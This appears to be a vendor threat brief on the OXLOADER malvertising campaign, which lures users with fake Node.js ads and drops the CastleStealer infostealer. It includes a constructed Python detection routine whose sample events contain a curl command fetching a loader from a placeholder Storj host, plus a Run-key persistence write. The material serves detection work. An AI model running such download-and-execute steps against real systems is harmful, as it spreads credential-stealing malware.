Executive Summary
In June 2026, cybersecurity researchers identified a new malware loader named OXLOADER, which is being used to distribute the CastleStealer infostealer. The campaign begins with malicious Google Ads that redirect users searching for 'lts version of node.js' to a counterfeit website. This site delivers a batch script hosted on Storj, which, when executed, downloads and runs OXLOADER. OXLOADER employs advanced obfuscation techniques and anti-analysis measures to evade detection, ultimately deploying CastleStealer to exfiltrate sensitive information from infected systems.
This incident underscores the evolving tactics of threat actors who exploit legitimate services like Google Ads and Storj to distribute malware. The sophisticated obfuscation and anti-analysis methods used by OXLOADER highlight the increasing complexity of malware designed to bypass traditional security measures, posing significant challenges for detection and mitigation.
Why This Matters Now
The OXLOADER campaign exemplifies the growing trend of cybercriminals leveraging legitimate platforms to disseminate malware, making detection more challenging. Organizations must enhance their security protocols to address these sophisticated attack vectors and protect sensitive data from emerging threats.
Attack Path Analysis
The attack began with malicious Google Ads leading users to a fake Node.js download page, resulting in the download and execution of OXLOADER, which then deployed CastleStealer to exfiltrate sensitive data.
Kill Chain Progression
Initial Compromise
Description
Users were lured through malicious Google Ads to a counterfeit Node.js download site, leading to the download and execution of OXLOADER.
MITRE ATT&CK® Techniques
Application Layer Protocol: Web Protocols
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Command and Scripting Interpreter: Windows Command Shell
Masquerading
Deobfuscate/Decode Files or Information
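The chain above (batch script launched through cmd.exe, loader fetched from Storj, persistence via a Run key) can be detected as a sequence rather than as isolated events. The following correlation logic is an added illustration, not code from the brief or from any vendor; the Sysmon-style events, PIDs, paths and the Storj URL are all constructed placeholders.

```python
"""Constructed detection logic for the OXLOADER delivery chain: cmd.exe running a
batch file (T1059.003), a child fetching from a Storj-hosted URL, then a Run-key
write (T1547.001) from the same process tree. All sample telemetry is made up."""
import re

STORJ_URL = re.compile(r"https?://[^\s\"']*storj[^\s\"']*", re.I)  # assumption: Storj host in URL
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)             # HKCU/HKLM ...\Run\<name>

SAMPLE_EVENTS = [  # constructed Sysmon-like events: id 1 = process create, id 13 = registry set
    {"id": 1, "ts": 1, "pid": 4001, "ppid": 3900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\node-lts-setup.bat"'},
    {"id": 1, "ts": 2, "pid": 4002, "ppid": 4001, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s https://PLACEHOLDER.storj.example/loader.bin -o C:\Users\u\AppData\Local\Temp\update.exe"},
    {"id": 1, "ts": 3, "pid": 4003, "ppid": 4001, "image": r"C:\Users\u\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe"},
    {"id": 13, "ts": 4, "pid": 4003,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NodeUpdate",
     "details": r"C:\Users\u\AppData\Local\Temp\update.exe"},
    {"id": 1, "ts": 5, "pid": 5001, "ppid": 3900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\build\run_tests.bat"'},  # benign batch job, must not alert
]

def detect_chain(events):
    """Return one alert per cmd.exe batch launch whose process tree both downloaded
    from a Storj URL and later wrote a Run key; a lone batch file does not alert."""
    parent = {e["pid"]: e["ppid"] for e in events if e["id"] == 1}
    root_pids = {e["pid"] for e in events if e["id"] == 1
                 and e["image"].lower().endswith("\\cmd.exe") and ".bat" in e["cmdline"].lower()}

    def root_of(pid):  # walk up the tree until a batch-launching cmd.exe (or nothing) is found
        while pid is not None and pid not in root_pids:
            pid = parent.get(pid)
        return pid

    state = {}
    for e in events:
        root = root_of(e["pid"])
        if root is None:
            continue
        s = state.setdefault(root, {"download": None, "runkey": None})
        if e["id"] == 1 and STORJ_URL.search(e["cmdline"]):
            s["download"] = e["ts"]
        if e["id"] == 13 and RUN_KEY.search(e["target"]):
            s["runkey"] = (e["ts"], e["target"])
    return [{"root_pid": r, "techniques": ["T1059.003", "T1547.001"], "run_key": s["runkey"][1]}
            for r, s in state.items()
            if s["download"] is not None and s["runkey"] and s["runkey"][0] > s["download"]]
```

Ordering matters: the Run-key write must follow the download inside the same tree, which keeps ordinary batch jobs and unrelated Run-key edits from firing.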
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the incident, including operational, regulatory, and cloud security risks.
Financial Services
OXLOADER's infostealer capabilities targeting financial credentials through malicious Google Ads pose severe risks to banking operations and customer data protection.
Marketing/Advertising/Sales
Malicious Google Ads campaign exploiting advertising platforms creates direct attack vectors against marketing professionals managing digital advertising campaigns and budgets.
Computer Software/Engineering
CastleStealer targeting software development environments threatens source code, credentials, and intellectual property through sophisticated loader mechanisms and encrypted traffic.
Health Care / Life Sciences
Infostealer malware compromising healthcare systems violates HIPAA compliance requirements while threatening patient data through east-west traffic and lateral movement.
Sources
- New OXLOADER Loader Uses Malicious Google Ads to Deliver CastleStealer, The Hacker News: https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
- OXLOADER: new loader evading detection to drop infostealer, Elastic Security Labs: https://www.elastic.co/security-labs/oxloader-malware-loader-infostealer
- ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer, CraftedSignal Threat Feed: https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the malware's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF would likely have constrained the malware's ability to communicate with unauthorized external servers, reducing the risk of successful initial compromise.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation would likely have restricted the malware's access to sensitive resources, even with elevated privileges, thereby limiting its potential impact.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security would likely have limited the malware's ability to move laterally, thereby reducing the risk of widespread infection.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control would likely have detected and restricted unauthorized command and control communications, thereby limiting the malware's operational capabilities.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement would likely have restricted unauthorized data exfiltration, thereby reducing the risk of data loss.
The implementation of CNSF controls would likely have reduced the overall impact by limiting unauthorized access and data exfiltration.
Impact at a Glance
Affected Business Functions
- Software Development
- IT Operations
- Customer Support
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive customer data and internal credentials.
Recommended Actions
Key Takeaways & Next Steps
- Implement Egress Security & Policy Enforcement to restrict unauthorized outbound traffic and prevent data exfiltration.
- Deploy Inline IPS (Suricata) to detect and block known exploit patterns and malicious payloads.
- Utilize Cloud Firewall (ACF) to control and monitor outbound connections, reducing the risk of command and control communications.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities promptly.
- Apply Zero Trust Segmentation to limit lateral movement within the network by enforcing least privilege access controls.